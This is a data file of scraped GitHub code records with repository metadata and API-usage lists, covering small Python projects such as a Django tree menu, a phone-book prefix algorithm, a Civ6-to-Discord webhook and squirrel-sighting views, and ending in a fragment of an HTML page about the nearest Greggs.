"usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 28, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 29, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 30, "usage_type": "attribute"}, {"api_name": "tensorflow.abs", "line_number": 31, "usage_type": "call"}, {"api_name": "tensorflow.log", "line_number": 33, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 34, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 34, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Feature", "line_number": 38, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 38, "usage_type": "attribute"}, {"api_name": "tensorflow.train.BytesList", "line_number": 38, "usage_type": "call"}, {"api_name": "tensorflow.train.Feature", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 44, "usage_type": "attribute"}, {"api_name": "tensorflow.train.FloatList", "line_number": 44, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 72, "usage_type": "call"}, {"api_name": "tensorflow.data.Dataset.from_tensor_slices", "line_number": 89, "usage_type": "call"}, {"api_name": 
"tensorflow.data", "line_number": 89, "usage_type": "attribute"}, {"api_name": "tensorflow.data.experimental.map_and_batch", "line_number": 91, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 91, "usage_type": "attribute"}, {"api_name": "multiprocessing.cpu_count", "line_number": 94, "usage_type": "call"}, {"api_name": "tensorflow.python_io.TFRecordWriter", "line_number": 106, "usage_type": "call"}, {"api_name": "tensorflow.python_io", "line_number": 106, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 108, "usage_type": "call"}, {"api_name": "tensorflow.keras.utils.Progbar", "line_number": 112, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 112, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Example", "line_number": 134, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 134, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Features", "line_number": 134, "usage_type": "call"}, {"api_name": "tensorflow.errors", "line_number": 138, "usage_type": "attribute"}, {"api_name": "tensorflow.python_io.TFRecordWriter", "line_number": 148, "usage_type": "call"}, {"api_name": "tensorflow.python_io", "line_number": 148, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Example", "line_number": 153, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 153, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Features", "line_number": 153, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path", "line_number": 157, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 162, "usage_type": "call"}]}
+{"seq_id": "17188000546", "text": "from django import template\nfrom treemenu.models import Category\nfrom typing import List, Dict\nfrom django.shortcuts import get_object_or_404\n\nHREF = '''\n\n \n %s \n \n'''\n\nregister = template.Library()\n\n\ndef get_menu(menu: List[Category], item: Category) -> dict:\n \"\"\"Функция возвращет словарь с узлами и их потомками,\n которые надо вывести на страницы.\"\"\"\n\n if item is None:\n return {'/': menu.filter(parent=None)}\n children = item.get_children()\n menu_dict = get_menu(menu, item.parent)\n menu_dict[item.title] = children\n return menu_dict\n\n\ndef get_html(menu: Dict[str, List[Category]],\n dir: List[Category]) -> str:\n \"\"\"Функция формирует html код для выбранного пункта меню.\"\"\"\n\n html_code = ''\n for node in dir:\n html_code += HREF % (node.title, node.title)\n children = menu.pop(node.title, False)\n if children:\n html_code += get_html(menu, children)\n html_code += ' '\n return html_code\n\n\n@register.simple_tag()\ndef draw_menu(name_menu):\n menu_list = Category.objects.select_related('parent').all()\n if name_menu is None:\n item = name_menu\n else:\n item = get_object_or_404(menu_list, title=name_menu)\n dict_menu = get_menu(menu_list, item)\n roots_dir = dict_menu.pop('/')\n return get_html(dict_menu, roots_dir)\n", "repo_name": "malabr1sta/testapp", "sub_path": "testapp/treemenu/templatetags/treemenutags.py", "file_name": "treemenutags.py", "file_ext": "py", "file_size_in_byte": 1487, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.template.Library", "line_number": 13, "usage_type": "call"}, {"api_name": "django.template", "line_number": 13, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 16, "usage_type": "name"}, {"api_name": "treemenu.models.Category", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 28, "usage_type": "name"}, {"api_name": "treemenu.models.Category", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 29, "usage_type": "name"}, {"api_name": "treemenu.models.Category", "line_number": 29, "usage_type": "name"}, {"api_name": "treemenu.models.Category.objects.select_related", "line_number": 44, "usage_type": "call"}, {"api_name": "treemenu.models.Category.objects", "line_number": 44, "usage_type": "attribute"}, {"api_name": "treemenu.models.Category", "line_number": 44, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 48, "usage_type": "call"}]}
+{"seq_id": "2920552428", "text": "from collections import deque\n\ndef landline_list(phone_book):\n \"\"\"\n 시작 시간: 14:46\n 종료 시간: 15:46\n 걸린 시간: 60분\n\n 결과: 정확성 테스트는 통과했으나, 효율성 테스트에서 시간초과 나옴\n 원인: 사용한 알고리즘의 시간복잡도 O(n^2)\n 해결:\n 정수 문자열을 정렬하면, 접두사와 접두사가 붙은 문자열이 앞 뒤로 정렬된다는 것을 이용함\n 앞 뒤 문자열 비교를 위해 deque.rotate() 를 사용해서 앞 뒤 문자열을 비교할 수 있도록 함\n\n 정리:\n 테스트 케이스가 100만개로 시간복잡도 O(n^2) 알고리즘으로 풀면 안된다는 것을 알았지만 다른 풀이가 떠오르지 않음\n 많은 문제를 풀어볼 필요가 있음\n \"\"\"\n answer = True\n\n phone_book = sorted(phone_book)\n rotated_book = deque(phone_book)\n rotated_book.rotate(-1)\n\n for number1, number2 in zip(phone_book, rotated_book):\n if number2.startswith(number1):\n return False\n \n return answer\n\nprint(landline_list([\"119\", \"456\", \"11955\"]))", "repo_name": "jacob3015/playdata-python-algorithm", "sub_path": "src/programmers/landline_list.py", "file_name": "landline_list.py", "file_ext": "py", "file_size_in_byte": 1123, "program_lang": "python", "lang": "ko", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "collections.deque", "line_number": 22, "usage_type": "call"}]}
+{"seq_id": "20538989877", "text": "import asyncio\nimport json\nfrom os import path, getenv\nfrom quart import Quart, request\nfrom .game_tracker import CivGameTracker\nfrom .discord_bot import CivDiscordNotifyBotClient, add_commands_to_bot\n\napp = Quart(__name__)\n\nlocal_path = path.abspath(path.dirname(__file__))\nsample_json_path = path.join(local_path, \"..\", \"sample_games.json\")\nwith open(sample_json_path) as f:\n game_data = json.load(f)\n\ngame_tracker = CivGameTracker.from_dict(game_data)\n\n\n@app.before_serving\nasync def start_discord_client():\n token = getenv(\"CIV6_NOTIFY_DISCORD_TOKEN\")\n loop = asyncio.get_event_loop()\n discord_bot = CivDiscordNotifyBotClient(loop)\n add_commands_to_bot(discord_bot)\n\n game_tracker.discord_client = discord_bot\n loop.create_task(discord_bot.start(token))\n\n\n@app.route(\"/civ6\", methods=[\"POST\"])\nasync def civ_webhook():\n data = json.loads(await request.get_data())\n try:\n game_name = data[\"value1\"]\n player_name = data[\"value2\"]\n turn_count = int(data[\"value3\"])\n except KeyError:\n pass\n\n game_tracker.update_game(game_name, player_name, turn_count)\n return \"success\\n\"\n\n\nif __name__ == \"__main__\":\n app.run()\n", "repo_name": "SpenserHaddad/civ6-discord-notify", "sub_path": "civ6_notify/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 1180, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "quart.Quart", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "name"}, {"api_name": "json.load", "line_number": 13, "usage_type": "call"}, {"api_name": "game_tracker.CivGameTracker.from_dict", "line_number": 15, "usage_type": "call"}, {"api_name": "game_tracker.CivGameTracker", "line_number": 15, "usage_type": "name"}, {"api_name": "os.getenv", "line_number": 20, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 21, "usage_type": "call"}, {"api_name": "discord_bot.CivDiscordNotifyBotClient", "line_number": 22, "usage_type": "call"}, {"api_name": "discord_bot.add_commands_to_bot", "line_number": 23, "usage_type": "call"}, {"api_name": "game_tracker.discord_client", "line_number": 25, "usage_type": "attribute"}, {"api_name": "discord_bot.start", "line_number": 26, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 31, "usage_type": "call"}, {"api_name": "quart.request.get_data", "line_number": 31, "usage_type": "call"}, {"api_name": "quart.request", "line_number": 31, "usage_type": "name"}, {"api_name": "game_tracker.update_game", "line_number": 39, "usage_type": "call"}]}
+{"seq_id": "9083183712", "text": "from django.shortcuts import render\nfrom django.http import JsonResponse\nfrom django.shortcuts import get_object_or_404\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom django.db.models import Max, Min, Count, Avg\nfrom .models import Sighting\nfrom .forms import SightingForm\nfrom django.views.generic.edit import CreateView, DeleteView\n\n\n\ndef map(request):\n sighting = Sighting.objects.all()[:100]\n context = {'sighting': sighting}\n return render(request, 'track/map.html',context)\n\n\n#unique id\ndef update_sighting(request,unique_squirrel_id):\n squirrel = get_object_or_404(Sighting, unique_squirrel_id=unique_squirrel_id)\n form = SightingForm(request.POST or None, instance=squirrel)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('track:list_sightings'))\n return render(request, 'track/update.html', {'form':form})\n\n\n#add\ndef create_sighting(request):\n squirrel = Sighting()\n if request.method == 'POST':\n form = SightingForm(request.POST)\n if form.is_valid():\n squirrel = form.save()\n return HttpResponseRedirect(reverse('track:list_sightings'))\n else:\n form = SightingForm() \n return render(request, 'track/add.html', {'form': form,'squirrel':squirrel})\n\n\n#stats\ndef obtain_stats(request):\n squirrels = Sighting.objects.all()\n total = len(squirrels)\n avg_hectare_squirrel_num = squirrels.aggregate(Avg('Hectare Squirrel Number')).values()[0] \n num_juve = len(squirrels.filter(age='Juvenile'))\n num_adult = len(squirrels.filter(age='Adult'))\n fur_color = squirrels.values_list('Primary Fur Color').annotate(fur_count=Count('Primary Fur Color')).order_by('-fur_count')\n context = {'total number of squrrels':total,\n 'average number of squirrels per hectare':avg_hectare_squirrel_num,\n 'total number of juvenile':num_juve,\n 'total number of adult':num_adult,\n 'most common fur color':fur_color,\n }\n return render(request, 'track/stats.html', context)\n\n#sightings\ndef list_sightings(request):\n sighting = Sighting.objects.all()\n context = {\n 'sighting': sighting,\n }\n return render(request, 'track/sighting.html', context)\n\ndef index(request):\n return HttpResponse(\"Index Page\")\n", "repo_name": "YifanXia0623/squirrel-project", "sub_path": "track/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2358, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "models.Sighting.objects.all", "line_number": 14, "usage_type": "call"}, {"api_name": "models.Sighting.objects", "line_number": 14, "usage_type": "attribute"}, {"api_name": "models.Sighting", "line_number": 14, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 16, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 21, "usage_type": "call"}, {"api_name": "models.Sighting", "line_number": 21, "usage_type": "argument"}, {"api_name": "forms.SightingForm", "line_number": 22, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 25, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 26, "usage_type": "call"}, {"api_name": "models.Sighting", "line_number": 31, "usage_type": "call"}, {"api_name": "forms.SightingForm", "line_number": 33, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 36, "usage_type": "call"}, {"api_name": "forms.SightingForm", "line_number": 
38, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 39, "usage_type": "call"}, {"api_name": "models.Sighting.objects.all", "line_number": 44, "usage_type": "call"}, {"api_name": "models.Sighting.objects", "line_number": 44, "usage_type": "attribute"}, {"api_name": "models.Sighting", "line_number": 44, "usage_type": "name"}, {"api_name": "django.db.models.Avg", "line_number": 46, "usage_type": "call"}, {"api_name": "django.db.models.Count", "line_number": 49, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 56, "usage_type": "call"}, {"api_name": "models.Sighting.objects.all", "line_number": 60, "usage_type": "call"}, {"api_name": "models.Sighting.objects", "line_number": 60, "usage_type": "attribute"}, {"api_name": "models.Sighting", "line_number": 60, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 64, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 67, "usage_type": "call"}]}
+{"seq_id": "14775027426", "text": "from bs4 import BeautifulSoup\nfrom dexy.filter import DexyFilter\nimport inflection\nimport re\n\nclass Customize(DexyFilter):\n \"\"\"\n Add \n\n \n\n Your closest greggs is \"\"\"+str(distance)+\"\"\"meters away \n
\n Scan to get google maps directions \n
\n \n\n\n\n